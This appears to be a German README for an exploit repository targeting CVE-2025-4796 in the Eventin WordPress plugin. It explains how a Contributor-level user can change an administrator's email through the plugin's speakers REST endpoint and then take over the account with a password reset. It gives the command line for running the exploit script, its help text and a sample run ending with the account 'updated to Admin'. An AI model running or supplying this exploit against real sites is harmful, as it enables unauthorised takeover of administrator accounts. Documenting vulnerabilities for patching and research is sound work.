
Eventin <= 4.0.34 - Authentifizierte (Contributor+) Privilegienerweiterung über Benutzer-E-Mail-Änderung/Kontoübernahme
Eventin <= 4.0.34 – Authentifizierte (Contributor+) Privilegieneskalation über E-Mail-Änderung/Kontoübernahme
Dieses Repository dokumentiert eine Privilegieneskalations-Schwachstelle im Eventin-WordPress-Plugin (<= 4.0.34), die es einem authentifizierten Benutzer mit Contributor+-Berechtigungen ermöglicht, die E-Mail-Adressen beliebiger Benutzer über die Speaker-Update-API des Plugins zu ändern. Durch die Änderung der E-Mail-Adresse eines Administrators kann ein Angreifer eine Passwortzurücksetzung auslösen und so die Kontenübernahme erreichen.
Verwundbare Komponente: Eventin-WordPress-Plugin (Eventin\Speaker\Api\SpeakerController::update_item)
Betroffene Versionen: <= 4.0.34
CVE: CVE-2025-4796
CVSS: 8.8 (Hoch)
Aktive Installationen: 10.000+
Eventin validiert die Identität oder Berechtigung des Aufrufers nicht ordnungsgemäß, bevor Speaker-/Benutzerdetails (insbesondere die E-Mail-Adresse) aktualisiert werden. Ein Angreifer, der als Contributor (oder höher) authentifiziert ist, kann die E-Mail-Adresse anderer Benutzer – einschließlich Administratoren – über den REST-Endpunkt des Plugins ändern:
Sobald die E-Mail-Adresse in eine vom Angreifer kontrollierte Adresse geändert wurde, kann der standardmäßige WordPress-Ablauf zur Passwortzurücksetzung genutzt werden, um das Konto zu übernehmen.
Dateiname: CVE-2025-4796.py
Dieses Skript automatisiert die folgenden Schritte:
/wp-json/eventin/v2/speakers/<speaker_id>, um die E-Mail-Adresse des Speakers zu aktualisieren.Anforderungen:
Installation:
pip install requests
Führen Sie das Skript über die Befehlszeile aus:
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
Skript-Hilfe anzeigen:
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
Von: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/